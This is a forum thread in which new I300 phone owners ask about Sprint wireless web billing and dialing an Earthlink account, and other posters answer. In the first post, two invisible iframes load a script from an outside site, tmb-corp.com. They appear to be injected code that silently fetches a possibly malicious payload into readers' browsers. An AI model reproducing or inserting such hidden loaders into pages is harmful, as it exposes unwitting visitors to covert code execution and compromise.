+ Reply to Thread
Page 1 of 2 1 2 LastLast

Newbie I300/ISP questions

just got my I300. Loving every second of it. An amazing toy.

Question about the internet service though. (I am a newbie, please be patient..)

I have used sprint pcs for a long time, but i'm not signed up for their wireless internet services for web browsing, etc.
    As I understand it, it will cost an additional $0.30 a minute to browse the web with the I300?

I already have another ISP (earthlink) -- would it be better to just have the I300 dial up earthlink, and I could use my 1500 free voice minutes instead of having to use special "internet time"?

Is that even a viable option? If so, has anyone tried it?

thanks for the help; i'm stoked about not having to carry a separate palm & cell phone any longer.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

that won't work.... anytime you use the phone for a "data" call, its billed as wireless web minutes....

Brooks

you can set your I300 to sign on to the internet using your Earthlink account. set the telephone number, user id, and password up just as you would for your computer.

when you are connected you use your plans minutes just as if you were making a phone call. although you do need to have the wireless web option to make data calls. (sprint can tell the differende between data calls and voice)

Wireless Web Minutes???

Are all Wireless Web minutes, no matter what time you log on (i.e. after 9pm and on weekends) automaticallly charged to your ANYTIME minutes first?

I signed up for the 200/2800 with the wireless web for free for the first 3 month deal, but it shows I'm over my ANYTIME minutes already but only if you add my Wireless Web minutes to it??? But most of the internet usuage were at night...???